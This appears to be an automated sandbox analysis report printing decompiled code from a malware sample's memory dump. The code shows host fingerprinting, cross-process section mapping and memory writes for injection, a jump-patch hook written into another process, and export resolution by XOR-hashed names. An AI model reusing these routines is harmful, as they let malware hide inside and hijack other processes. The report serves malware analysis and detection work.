                                    					 *((intOrPtr*)(_t222 + 0x214)) = _t181;
                                    				} else {
                                    					 *((intOrPtr*)(_t222 + 0x214)) = 3;
                                    				}
                                    				_t12 = _t222 + 0x220; // 0x220, executed
                                    				_t91 = E1000E3F1(_t12); // executed
                                    				 *((intOrPtr*)(_t222 + 0x218)) = _t91;
                                    				_t92 = E1000E3B6(_t12); // executed
                                    				 *((intOrPtr*)(_t222 + 0x21c)) = _t92;
                                    				 *(_t222 + 0x224) = _t162;
                                    				_v12 = 0x80;
                                    				_v8 = 0x100;
                                    				_t22 = _t222 + 0x114; // 0x114
                                    				if(LookupAccountSidW(0,  *( *(_t222 + 0x110)), _t22,  &_v12,  &_v692,  &_v8,  &_v16) == 0) {
                                    					GetLastError();
                                    				}
                                    				_t97 =  *0x1001e694; // 0x8abfbf8
                                    				_t98 =  *((intOrPtr*)(_t97 + 0x3c))(0x1000);
                                    				_t26 = _t222 + 0x228; // 0x228
                                    				 *(_t222 + 0x1850) = 0 | _t98 > 0x00000000;
                                    				GetModuleFileNameW( *(_t222 + 0x224), _t26, 0x105);
                                    				GetLastError();
                                    				_t31 = _t222 + 0x228; // 0x228
                                    				 *((intOrPtr*)(_t222 + 0x434)) = E10008FBE(_t31, _t98);
                                    				_t34 = _t222 + 0x114; // 0x114, executed
                                    				_t103 = E1000B7A8(_t34,  &_v692);
                                    				_t35 = _t222 + 0xb0; // 0xb0
                                    				 *((intOrPtr*)(_t222 + 0xac)) = _t103;
                                    				_push(_t35);
                                    				E1000B67D(_t103, _t35, _t98, _t241);
                                    				_t37 = _t222 + 0xb0; // 0xb0
                                    				_t105 = _t37;
                                    				_t38 = _t222 + 0xd0; // 0xd0
                                    				_t164 = _t38;
                                    				if(_t105 != 0) {
                                    					_t159 = MultiByteToWideChar(0, 0, _t105, 0xffffffff, _t164, 0x20);
                                    					if(_t159 > 0) {
                                    						_t164[_t159] = 0;
                                    					}
                                    				}
                                    				_t41 = _t222 + 0x438; // 0x438
                                    				_t42 = _t222 + 0x228; // 0x228
                                    				E10008FD8(_t42, _t41);
                                    				_t43 = _t222 + 0xb0; // 0xb0
                                    				_t108 = E1000D400(_t43, E1000C379(_t43), 0);
                                    				_t44 = _t222 + 0x100c; // 0x100c
                                    				E1000B88A(_t108, _t44, _t241);
                                    				_t199 = GetCurrentProcess(); // executed
                                    				_t111 = E1000BBDF(_t110); // executed
                                    				 *((intOrPtr*)(_t222 + 0x101c)) = _t111;
                                    				memset(_t222, 0, 0x9c);
                                    				_t224 = _t223 + 0xc;
                                    				_t222->dwOSVersionInfoSize = 0x9c;
                                    				GetVersionExA(_t222);
                                    				_t167 =  *0x1001e684; // 0x8abfaa0
                                    				_t115 = 0;
                                    				_v8 = 0;
                                    				if( *((intOrPtr*)(_t167 + 0x6c)) != 0) {
                                    					 *((intOrPtr*)(_t167 + 0x6c))(GetCurrentProcess(),  &_v8);
                                    					_t115 = _v8;
                                    				}
                                    				 *((intOrPtr*)(_t222 + 0xa8)) = _t115;
                                    				if(_t115 == 0) {
                                    					GetSystemInfo( &_v52);
                                    					_t117 = _v52.dwOemId & 0x0000ffff;
                                    				} else {
                                    					_t117 = 9;
                                    				}
                                    				_t54 = _t222 + 0x1020; // 0x1020
                                    				_t168 = _t54;
                                    				 *(_t222 + 0x9c) = _t117;
                                    				GetWindowsDirectoryW(_t168, 0x104);
                                    				_t119 = E100095E1(_t199, 0x10c);
                                    				_t200 =  *0x1001e684; // 0x8abfaa0
                                    				_t218 = _t119;
                                    				 *_t224 = 0x104;
                                    				_push( &_v704);
                                    				_push(_t218);
                                    				_v8 = _t218;
                                    				if( *((intOrPtr*)(_t200 + 0xe0))() == 0) {
                                    					_t154 =  *0x1001e684; // 0x8abfaa0
                                    					 *((intOrPtr*)(_t154 + 0xfc))(_t218, _t168);
                                    				}
                                    				E100085D5( &_v8);
                                    				_t124 =  *0x1001e684; // 0x8abfaa0
                                    				_t61 = _t222 + 0x1434; // 0x1434
                                    				_t219 = _t61;
                                    				 *_t224 = 0x209;
                                    				_push(_t219);
                                    				_push(L"USERPROFILE");
                                    				if( *((intOrPtr*)(_t124 + 0xe0))() == 0) {
                                    					E10009640(_t219, 0x105, L"%s\\%s", _t168);
                                    					_t152 =  *0x1001e684; // 0x8abfaa0
                                    					_t224 =  &(_t224[5]);
                                    					 *((intOrPtr*)(_t152 + 0xfc))(L"USERPROFILE", _t219, "TEMP");
                                    				}
                                    				_push(0x20a);
                                    				_t64 = _t222 + 0x122a; // 0x122a
                                    				_t169 = L"TEMP";
                                    				_t127 =  *0x1001e684; // 0x8abfaa0
                                    				_push(_t169);
                                    				if( *((intOrPtr*)(_t127 + 0xe0))() == 0) {
                                    					_t149 =  *0x1001e684; // 0x8abfaa0
                                    					 *((intOrPtr*)(_t149 + 0xfc))(_t169, _t219);
                                    				}
                                    				_push(0x40);
                                    				_t220 = L"SystemDrive";
                                    				_push( &_v180);
                                    				_t130 =  *0x1001e684; // 0x8abfaa0
                                    				_push(_t220);
                                    				if( *((intOrPtr*)(_t130 + 0xe0))() == 0) {
                                    					_t147 =  *0x1001e684; // 0x8abfaa0
                                    					 *((intOrPtr*)(_t147 + 0xfc))(_t220, L"C:");
                                    				}
                                    				_v8 = 0x7f;
                                    				_t72 = _t222 + 0x199c; // 0x199c
                                    				_t134 =  *0x1001e684; // 0x8abfaa0
                                    				 *((intOrPtr*)(_t134 + 0xb0))(_t72,  &_v8);
                                    				_t75 = _t222 + 0x100c; // 0x100c
                                    				E10012301(E1000D400(_t75, E1000C379(_t75), 0),  &_v2680);
                                    				_t76 = _t222 + 0x1858; // 0x1858
                                    				E100122D3( &_v2680, _t76, 0x20);
                                    				_t79 = _t222 + 0x1878; // 0x1878
                                    				E1000902D(1, _t79, 0x14, 0x1e,  &_v2680);
                                    				_t145 = E1000CD33(_t79); // executed
                                    				 *((intOrPtr*)(_t222 + 0x1898)) = _t145;
                                    				return _t222;
                                    			}

                                    APIs
                                      • Part of subcall function 10008604: HeapAlloc.KERNEL32(00000008,?,?,10008F84,00000100,?,10005FCB), ref: 10008612
                                    • GetCurrentProcessId.KERNEL32 ref: 1000D046
                                    • GetModuleFileNameW.KERNEL32(00000000,00001644,00000105), ref: 1000D082
                                    • GetCurrentProcess.KERNEL32 ref: 1000D09F
                                    • LookupAccountSidW.ADVAPI32(00000000,?,00000114,00000080,?,?,?), ref: 1000D131
                                    • GetLastError.KERNEL32 ref: 1000D13E
                                    • GetModuleFileNameW.KERNEL32(?,00000228,00000105), ref: 1000D16C
                                    • GetLastError.KERNEL32 ref: 1000D172
                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,000000B0,000000FF,000000D0,00000020), ref: 1000D1C7
                                    • GetCurrentProcess.KERNEL32 ref: 1000D20E
                                      • Part of subcall function 1000BA62: CloseHandle.KERNEL32(?,00000000,74EC17D9,10000000), ref: 1000BB06
                                    • memset.MSVCRT ref: 1000D229
                                    • GetVersionExA.KERNEL32(00000000), ref: 1000D234
                                    • GetCurrentProcess.KERNEL32(00000100), ref: 1000D24E
                                    • GetSystemInfo.KERNEL32(?), ref: 1000D26A
                                    • GetWindowsDirectoryW.KERNEL32(00001020,00000104), ref: 1000D287
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.618638056.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                    • Associated: 00000006.00000002.618621006.0000000010000000.00000002.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: CurrentProcess$ErrorFileLastModuleName$AccountAllocByteCharCloseDirectoryHandleHeapInfoLookupMultiSystemVersionWideWindowsmemset
                                    • String ID: %s\%s$SystemDrive$TEMP$TEMP$USERPROFILE
                                    • API String ID: 1475707489-2706916422
                                    • Opcode ID: 0c8f5eddded76bb9b62fb23a4c6a166a1871e87999110820d407c1f563147e74
                                    • Instruction ID: b43297c2b7e84521e640d7514395b2e770dddaaf3bf4c430bd1fb4440b0adffa
                                    • Opcode Fuzzy Hash: 0c8f5eddded76bb9b62fb23a4c6a166a1871e87999110820d407c1f563147e74
                                    • Instruction Fuzzy Hash: 7AB14875600709ABE714EB70CC89FEE77E8EF18380F01486EF55AD7195EB70AA448B21
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 86%
                                    			E1000C6C0(void* __ecx, intOrPtr __edx) {
                                    				void* _v8;
                                    				void* _v12;
                                    				void* _v16;
                                    				void* _v20;
                                    				long _v24;
                                    				long _v28;
                                    				void* _v32;
                                    				intOrPtr _v36;
                                    				long _v40;
                                    				void* _v44;
                                    				char _v56;
                                    				char _v72;
                                    				struct _WNDCLASSEXA _v120;
                                    				void* _t69;
                                    				intOrPtr _t75;
                                    				struct HWND__* _t106;
                                    				intOrPtr* _t113;
                                    				struct _EXCEPTION_RECORD _t116;
                                    				void* _t126;
                                    				void* _t131;
                                    				intOrPtr _t134;
                                    				void* _t140;
                                    				void* _t141;
                                    
                                    				_t69 =  *0x1001e688; // 0x8a40590
                                    				_t126 = __ecx;
                                    				_t134 = __edx;
                                    				_t116 = 0;
                                    				_v36 = __edx;
                                    				_v16 = 0;
                                    				_v44 = 0;
                                    				_v40 = 0;
                                    				_v12 = 0;
                                    				_v8 = 0;
                                    				_v24 = 0;
                                    				_v20 = __ecx;
                                    				if(( *(_t69 + 0x1898) & 0x00000040) != 0) {
                                    					E1000E23E(0x1f4);
                                    					_t116 = 0;
                                    				}
                                    				_t113 =  *((intOrPtr*)(_t134 + 0x3c)) + _t134;
                                    				_v28 = _t116;
                                    				if( *_t113 != 0x4550) {
                                    					L12:
                                    					if(_v8 != 0) {
                                    						_t75 =  *0x1001e780; // 0x8abfbc8
                                    						 *((intOrPtr*)(_t75 + 0x10))(_t126, _v8);
                                    						_v8 = _v8 & 0x00000000;
                                    					}
                                    					L14:
                                    					if(_v12 != 0) {
                                    						NtUnmapViewOfSection(GetCurrentProcess(), _v12);
                                    					}
                                    					if(_v16 != 0) {
                                    						NtClose(_v16);
                                    					}
                                    					return _v8;
                                    				}
                                    				_v44 =  *((intOrPtr*)(_t113 + 0x50));
                                    				if(NtCreateSection( &_v16, 0xe, _t116,  &_v44, 0x40, 0x8000000, _t116) < 0) {
                                    					goto L12;
                                    				}
                                    				_v120.style = 0xb;
                                    				_v120.cbSize = 0x30;
                                    				_v120.lpszClassName =  &_v56;
                                    				asm("movsd");
                                    				_v120.lpfnWndProc = DefWindowProcA;
                                    				asm("movsd");
                                    				asm("movsd");
                                    				asm("movsb");
                                    				asm("movsd");
                                    				asm("movsd");
                                    				asm("movsw");
                                    				asm("movsb");
                                    				_v120.cbWndExtra = 0;
                                    				_v120.lpszMenuName = 0;
                                    				_v120.cbClsExtra = 0;
                                    				_v120.hInstance = 0;
                                    				if(RegisterClassExA( &_v120) != 0) {
                                    					_t106 = CreateWindowExA(0,  &_v56,  &_v72, 0xcf0000, 0x80000000, 0x80000000, 0x1f4, 0x64, 0, 0, 0, 0); // executed
                                    					if(_t106 != 0) {
                                    						DestroyWindow(_t106); // executed
                                    						UnregisterClassA( &_v56, 0);
                                    					}
                                    				}
                                    				if(NtMapViewOfSection(_v16, GetCurrentProcess(),  &_v12, 0, 0, 0,  &_v24, 2, 0, 0x40) < 0) {
                                    					_t126 = _v20;
                                    					goto L12;
                                    				} else {
                                    					_t126 = _v20;
                                    					if(NtMapViewOfSection(_v16, _t126,  &_v8, 0, 0, 0,  &_v24, 2, 0, 0x40) < 0) {
                                    						goto L12;
                                    					}
                                    					_t140 = E10008669( *0x1001e688, 0x1ac4);
                                    					_v32 = _t140;
                                    					if(_t140 == 0) {
                                    						goto L12;
                                    					}
                                    					 *((intOrPtr*)(_t140 + 0x224)) = _v8;
                                    					_t131 = VirtualAllocEx(_t126, 0, 0x1ac4, 0x1000, 4);
                                    					WriteProcessMemory(_v20, _t131, _t140, 0x1ac4,  &_v28);
                                    					E1000861A( &_v32, 0x1ac4);
                                    					_t141 =  *0x1001e688; // 0x8a40590
                                    					 *0x1001e688 = _t131;
                                    					E100086E1(_v12, _v36,  *((intOrPtr*)(_t113 + 0x50)));
                                    					E1000C63F(_v12, _v8, _v36);
                                    					 *0x1001e688 = _t141;
                                    					goto L14;
                                    				}
                                    			}

                                    APIs
                                    • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000,10005CEC), ref: 1000C733
                                    • RegisterClassExA.USER32 ref: 1000C785
                                    • CreateWindowExA.USER32 ref: 1000C7B0
                                    • DestroyWindow.USER32 ref: 1000C7BB
                                    • UnregisterClassA.USER32(?,00000000), ref: 1000C7C6
                                    • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 1000C7E2
                                    • NtMapViewOfSection.NTDLL(?,00000000), ref: 1000C7EC
                                    • NtMapViewOfSection.NTDLL(?,1000CBA0,00000000,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 1000C813
                                    • VirtualAllocEx.KERNEL32(1000CBA0,00000000,00001AC4,00001000,00000004), ref: 1000C856
                                    • WriteProcessMemory.KERNEL32(1000CBA0,00000000,00000000,00001AC4,?), ref: 1000C86F
                                      • Part of subcall function 1000861A: HeapFree.KERNEL32(00000000,00000000,00000001), ref: 10008660
                                    • GetCurrentProcess.KERNEL32(00000000), ref: 1000C8DB
                                    • NtUnmapViewOfSection.NTDLL(00000000), ref: 1000C8E2
                                    • NtClose.NTDLL(00000000), ref: 1000C8F5
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.618638056.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                    • Associated: 00000006.00000002.618621006.0000000010000000.00000002.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: Section$ProcessView$ClassCreateCurrentWindow$AllocCloseDestroyFreeHeapMemoryRegisterUnmapUnregisterVirtualWrite
                                    • String ID: 0$cdcdwqwqwq$sadccdcdsasa
                                    • API String ID: 2002808388-2319545179
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 82%
                                    			_entry_(void* __edx, struct HINSTANCE__* _a4, WCHAR* _a8) {
                                    				long _v8;
                                    				char _v16;
                                    				short _v144;
                                    				short _v664;
                                    				void* _t19;
                                    				struct HINSTANCE__* _t22;
                                    				long _t23;
                                    				long _t24;
                                    				char* _t27;
                                    				WCHAR* _t32;
                                    				long _t33;
                                    				void* _t38;
                                    				void* _t49;
                                    				struct _SECURITY_ATTRIBUTES* _t53;
                                    				void* _t54;
                                    				intOrPtr* _t55;
                                    				void* _t57;
                                    
                                    				_t49 = __edx;
                                    				OutputDebugStringA("Hello qqq"); // executed
                                    				if(_a8 != 1) {
                                    					if(_a8 != 0) {
                                    						L12:
                                    						return 1;
                                    					}
                                    					SetLastError(0xaa);
                                    					L10:
                                    					return 0;
                                    				}
                                    				E100085EF();
                                    				_t19 = E1000980C( &_v16);
                                    				_t57 = _t49;
                                    				if(_t57 < 0 || _t57 <= 0 && _t19 < 0x2e830) {
                                    					goto L12;
                                    				} else {
                                    					E10008F78();
                                    					GetModuleHandleA(0);
                                    					_t22 = _a4;
                                    					 *0x1001e69c = _t22;
                                    					_t23 = GetModuleFileNameW(_t22,  &_v664, 0x104);
                                    					_t24 = GetLastError();
                                    					if(_t23 != 0 && _t24 != 0x7a) {
                                    						memset( &_v144, 0, 0x80);
                                    						_t55 = _t54 + 0xc;
                                    						_t53 = 0;
                                    						do {
                                    							_t27 = E100095C7(_t53);
                                    							_a8 = _t27;
                                    							MultiByteToWideChar(0, 0, _t27, 0xffffffff,  &_v144, 0x3f);
                                    							E100085C2( &_a8);
                                    							_t53 =  &(_t53->nLength);
                                    						} while (_t53 < 0x2710);
                                    						E10012A5B( *0x1001e69c);
                                    						 *_t55 = 0x7c3;
                                    						 *0x1001e684 = E1000E1BC(0x1001ba28, 0x11c);
                                    						 *_t55 = 0xb4e;
                                    						_t32 = E100095E1(0x1001ba28);
                                    						_a8 = _t32;
                                    						_t33 = GetFileAttributesW(_t32); // executed
                                    						_push( &_a8);
                                    						if(_t33 == 0xffffffff) {
                                    							E100085D5();
                                    							_v8 = 0;
                                    							_t38 = CreateThread(0, 0, E10005E06, 0, 0,  &_v8);
                                    							 *0x1001e6a8 = _t38;
                                    							if(_t38 == 0) {
                                    								goto L10;
                                    							}
                                    							goto L12;
                                    						}
                                    						E100085D5();
                                    					}
                                    					goto L10;
                                    				}
                                    			}

                                    APIs
                                    • OutputDebugStringA.KERNEL32(Hello qqq), ref: 10005F92
                                    • SetLastError.KERNEL32(000000AA), ref: 100060D7
                                      • Part of subcall function 100085EF: HeapCreate.KERNEL32(00000000,00080000,00000000,10005FA7), ref: 100085F8
                                      • Part of subcall function 1000980C: GetSystemTimeAsFileTime.KERNEL32(?,?,10005FAF), ref: 10009819
                                      • Part of subcall function 1000980C: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 10009839
                                    • GetModuleHandleA.KERNEL32(00000000), ref: 10005FCC
                                    • GetModuleFileNameW.KERNEL32(?,?,00000104), ref: 10005FE7
                                    • GetLastError.KERNEL32 ref: 10005FEF
                                    • memset.MSVCRT ref: 10006013
                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,0000003F), ref: 10006035
                                    • GetFileAttributesW.KERNEL32(00000000), ref: 10006083
                                    • CreateThread.KERNEL32(00000000,00000000,10005E06,00000000,00000000,?), ref: 100060B7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.618638056.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                    • Associated: 00000006.00000002.618621006.0000000010000000.00000002.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: File$CreateErrorLastModuleTime$AttributesByteCharDebugHandleHeapMultiNameOutputStringSystemThreadUnothrow_t@std@@@Wide__ehfuncinfo$??2@memset
                                    • String ID: Hello qqq
                                    • API String ID: 3435743081-3610097158
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 93%
                                    			E1000CB77(void* __ecx, void** __edx, void* __eflags, intOrPtr _a4) {
                                    				long _v8;
                                    				long _v12;
                                    				void* _v16;
                                    				intOrPtr _v23;
                                    				void _v24;
                                    				long _v28;
                                    				void* _v568;
                                    				void _v744;
                                    				void* __ebx;
                                    				void* __edi;
                                    				void* __esi;
                                    				struct HINSTANCE__* _t32;
                                    				intOrPtr _t33;
                                    				intOrPtr _t35;
                                    				void* _t39;
                                    				intOrPtr _t43;
                                    				void* _t63;
                                    				long _t65;
                                    				void* _t70;
                                    				void** _t73;
                                    				void* _t74;
                                    
                                    				_t73 = __edx;
                                    				_t63 = __ecx;
                                    				_t74 = 0;
                                    				if(E1000C4CE(__ecx, __edx, __edx, 0) != 0) {
                                    					_t39 = E1000C6C0( *((intOrPtr*)(__edx)), _a4); // executed
                                    					_t74 = _t39;
                                    					if(_t74 != 0) {
                                    						memset( &_v744, 0, 0x2cc);
                                    						_v744 = 0x10002;
                                    						_push( &_v744);
                                    						_t43 =  *0x1001e684; // 0x8abfaa0
                                    						_push(_t73[1]);
                                    						if( *((intOrPtr*)(_t43 + 0xa8))() != 0) {
                                    							_t70 = _v568;
                                    							_v12 = _v12 & 0x00000000;
                                    							_v24 = 0xe9;
                                    							_t65 = 5;
                                    							_v23 = _t74 - _t70 - _a4 + _t63 + 0xfffffffb;
                                    							_v8 = _t65;
                                    							_v16 = _t70;
                                    							if(NtProtectVirtualMemory( *_t73,  &_v16,  &_v8, 4,  &_v12) < 0 || NtWriteVirtualMemory( *_t73, _v568,  &_v24, _t65,  &_v8) < 0) {
                                    								L6:
                                    								_t74 = 0;
                                    							} else {
                                    								_v28 = _v28 & 0x00000000;
                                    								if(NtProtectVirtualMemory( *_t73,  &_v16,  &_v8, _v12,  &_v28) < 0) {
                                    									goto L6;
                                    								}
                                    							}
                                    						}
                                    					}
                                    				}
                                    				_t32 =  *0x1001e77c; // 0x0
                                    				if(_t32 != 0) {
                                    					FreeLibrary(_t32);
                                    					 *0x1001e77c =  *0x1001e77c & 0x00000000;
                                    				}
                                    				_t33 =  *0x1001e784; // 0x0
                                    				if(_t33 != 0) {
                                    					_t35 =  *0x1001e684; // 0x8abfaa0
                                    					 *((intOrPtr*)(_t35 + 0x10c))(_t33);
                                    					E1000861A(0x1001e784, 0xfffffffe);
                                    				}
                                    				return _t74;
                                    			}

                                    APIs
                                      • Part of subcall function 1000C4CE: LoadLibraryW.KERNEL32 ref: 1000C5C6
                                      • Part of subcall function 1000C4CE: memset.MSVCRT ref: 1000C605
                                    • FreeLibrary.KERNEL32(00000000,?,00000000,00000000), ref: 1000CC73
                                      • Part of subcall function 1000C6C0: NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000,10005CEC), ref: 1000C733
                                      • Part of subcall function 1000C6C0: RegisterClassExA.USER32 ref: 1000C785
                                      • Part of subcall function 1000C6C0: CreateWindowExA.USER32 ref: 1000C7B0
                                      • Part of subcall function 1000C6C0: DestroyWindow.USER32 ref: 1000C7BB
                                      • Part of subcall function 1000C6C0: UnregisterClassA.USER32(?,00000000), ref: 1000C7C6
                                    • memset.MSVCRT ref: 1000CBB8
                                    • NtProtectVirtualMemory.NTDLL(?,?,?,00000004,00000000), ref: 1000CC22
                                    • NtWriteVirtualMemory.NTDLL(?,?,000000E9,00000005,?), ref: 1000CC3F
                                    • NtProtectVirtualMemory.NTDLL(?,?,?,00000000,00000000), ref: 1000CC60
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.618638056.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                    • Associated: 00000006.00000002.618621006.0000000010000000.00000002.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: MemoryVirtual$ClassCreateLibraryProtectWindowmemset$DestroyFreeLoadRegisterSectionUnregisterWrite
                                    • String ID:
                                    • API String ID: 317994034-0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E1000ABA3(intOrPtr __ecx, void* __edx) {
                                    				void* _v304;
                                    				void* _v308;
                                    				signed int _t14;
                                    				signed int _t15;
                                    				void* _t22;
                                    				intOrPtr _t28;
                                    				void* _t31;
                                    				intOrPtr _t33;
                                    				void* _t40;
                                    				void* _t42;
                                    
                                    				_t33 = __ecx;
                                    				_t31 = __edx; // executed
                                    				_t14 = CreateToolhelp32Snapshot(2, 0);
                                    				_t42 = _t14;
                                    				_t15 = _t14 | 0xffffffff;
                                    				if(_t42 != _t15) {
                                    					memset( &_v304, 0, 0x128);
                                    					_v304 = 0x128;
                                    					if(Process32First(_t42,  &_v304) != 0) {
                                    						while(1) {
                                    							_t22 = E1000CCC0(_t33,  &_v308, _t31); // executed
                                    							_t40 = _t22;
                                    							if(_t40 == 0) {
                                    								break;
                                    							}
                                    							_t33 =  *0x1001e684; // 0x8abfaa0
                                    							if(Process32Next(_t42,  &_v308) != 0) {
                                    								continue;
                                    							}
                                    							break;
                                    						}
                                    						CloseHandle(_t42);
                                    						_t15 = 0 | _t40 == 0x00000000;
                                    					} else {
                                    						_t28 =  *0x1001e684; // 0x8abfaa0
                                    						 *((intOrPtr*)(_t28 + 0x30))(_t42);
                                    						_t15 = 0xfffffffe;
                                    					}
                                    				}
                                    				return _t15;
                                    			}

                                    APIs
                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000011,?,00000010), ref: 1000ABBD
                                    • memset.MSVCRT ref: 1000ABD6
                                    • Process32First.KERNEL32(00000000,?), ref: 1000ABED
                                    • Process32Next.KERNEL32(00000000,?), ref: 1000AC21
                                    • CloseHandle.KERNEL32(00000000), ref: 1000AC2E
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.618638056.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                    • Associated: 00000006.00000002.618621006.0000000010000000.00000002.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32memset
                                    • String ID:
                                    • API String ID: 1267121359-0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E1000DFAD(void* __ecx, intOrPtr __edx) {
                                    				signed int _v8;
                                    				intOrPtr _v12;
                                    				intOrPtr _v16;
                                    				intOrPtr _v20;
                                    				intOrPtr _v24;
                                    				intOrPtr _v28;
                                    				char _v92;
                                    				intOrPtr _t41;
                                    				signed int _t47;
                                    				signed int _t49;
                                    				signed int _t51;
                                    				void* _t56;
                                    				struct HINSTANCE__* _t58;
                                    				_Unknown_base(*)()* _t59;
                                    				intOrPtr _t60;
                                    				void* _t62;
                                    				intOrPtr _t63;
                                    				void* _t69;
                                    				char _t70;
                                    				void* _t75;
                                    				CHAR* _t80;
                                    				void* _t82;
                                    
                                    				_t75 = __ecx;
                                    				_v12 = __edx;
                                    				_t60 =  *((intOrPtr*)(__ecx + 0x3c));
                                    				_t41 =  *((intOrPtr*)(_t60 + __ecx + 0x78));
                                    				if(_t41 == 0) {
                                    					L4:
                                    					return 0;
                                    				}
                                    				_t62 = _t41 + __ecx;
                                    				_v24 =  *((intOrPtr*)(_t62 + 0x24)) + __ecx;
                                    				_t73 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
                                    				_t63 =  *((intOrPtr*)(_t62 + 0x18));
                                    				_v28 =  *((intOrPtr*)(_t62 + 0x1c)) + __ecx;
                                    				_t47 = 0;
                                    				_v20 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
                                    				_v8 = 0;
                                    				_v16 = _t63;
                                    				if(_t63 == 0) {
                                    					goto L4;
                                    				} else {
                                    					goto L2;
                                    				}
                                    				while(1) {
                                    					L2:
                                    					_t49 = E1000D400( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75, E1000C379( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75), 0);
                                    					_t51 = _v8;
                                    					if((_t49 ^ 0x218fe95b) == _v12) {
                                    						break;
                                    					}
                                    					_t73 = _v20;
                                    					_t47 = _t51 + 1;
                                    					_v8 = _t47;
                                    					if(_t47 < _v16) {
                                    						continue;
                                    					}
                                    					goto L4;
                                    				}
                                    				_t69 =  *((intOrPtr*)(_t60 + _t75 + 0x78)) + _t75;
                                    				_t80 =  *((intOrPtr*)(_v28 + ( *(_v24 + _t51 * 2) & 0x0000ffff) * 4)) + _t75;
                                    				if(_t80 < _t69 || _t80 >=  *((intOrPtr*)(_t60 + _t75 + 0x7c)) + _t69) {
                                    					return _t80;
                                    				} else {
                                    					_t56 = 0;
                                    					while(1) {
                                    						_t70 = _t80[_t56];
                                    						if(_t70 == 0x2e || _t70 == 0) {
                                    							break;
                                    						}
                                    						 *((char*)(_t82 + _t56 - 0x58)) = _t70;
                                    						_t56 = _t56 + 1;
                                    						if(_t56 < 0x40) {
                                    							continue;
                                    						}
                                    						break;
                                    					}
                                    					 *((intOrPtr*)(_t82 + _t56 - 0x58)) = 0x6c6c642e;
                                    					 *((char*)(_t82 + _t56 - 0x54)) = 0;
                                    					if( *((char*)(_t56 + _t80)) != 0) {
                                    						_t80 =  &(( &(_t80[1]))[_t56]);
                                    					}
                                    					_t40 =  &_v92; // 0x6c6c642e
                                    					_t58 = LoadLibraryA(_t40); // executed
                                    					if(_t58 == 0) {
                                    						goto L4;
                                    					}
                                    					_t59 = GetProcAddress(_t58, _t80);
                                    					if(_t59 == 0) {
                                    						goto L4;
                                    					}
                                    					return _t59;
                                    				}
                                    			}


                                    APIs
                                    • LoadLibraryA.KERNEL32(.dll), ref: 1000E07D
                                    • GetProcAddress.KERNEL32(00000000,8DF08B59), ref: 1000E089
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.618638056.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                    • Associated: 00000006.00000002.618621006.0000000010000000.00000002.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: AddressLibraryLoadProc
                                    • String ID: .dll
                                    • API String ID: 2574300362-2738580789
                                    • Opcode ID: b7447c8816937ad7f9345e32d2240df4bb2b7db976f4be3fc21d842f10db7ef4
                                    • Instruction ID: 6da95daea6e89431fe10e6910c52a9851ea62cfcad36df982cd2ab94b172e300
                                    • Opcode Fuzzy Hash: b7447c8816937ad7f9345e32d2240df4bb2b7db976f4be3fc21d842f10db7ef4
                                    • Instruction Fuzzy Hash: F631E431A002998BEB54CFA9C8847AEBBF5EF44384F24446DD905E7349D770ED81C7A0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 94%
                                    			E1000B7A8(WCHAR* __ecx, void* __edx) {
                                    				long _v8;
                                    				long _v12;
                                    				WCHAR* _v16;
                                    				short _v528;
                                    				short _v1040;
                                    				short _v1552;
                                    				WCHAR* _t27;
                                    				signed int _t29;
                                    				void* _t33;
                                    				long _t38;
                                    				WCHAR* _t43;
                                    				WCHAR* _t56;
                                    
                                    				_t44 = __ecx;
                                    				_v8 = _v8 & 0x00000000;
                                    				_t43 = __edx;
                                    				_t56 = __ecx;
                                    				memset(__edx, 0, 0x100);
                                    				_v12 = 0x100;
                                    				GetComputerNameW( &_v528,  &_v12);
                                    				lstrcpynW(_t43,  &_v528, 0x100);
                                    				_t27 = E100095E1(_t44, 0xa88);
                                    				_v16 = _t27;
                                    				_t29 = GetVolumeInformationW(_t27,  &_v1552, 0x100,  &_v8, 0, 0,  &_v1040, 0x100);
                                    				asm("sbb eax, eax");
                                    				_v8 = _v8 &  ~_t29;
                                    				E100085D5( &_v16);
                                    				_t33 = E1000C392(_t43);
                                    				E10009640( &(_t43[E1000C392(_t43)]), 0x100 - _t33, L"%u", _v8);
                                    				lstrcatW(_t43, _t56);
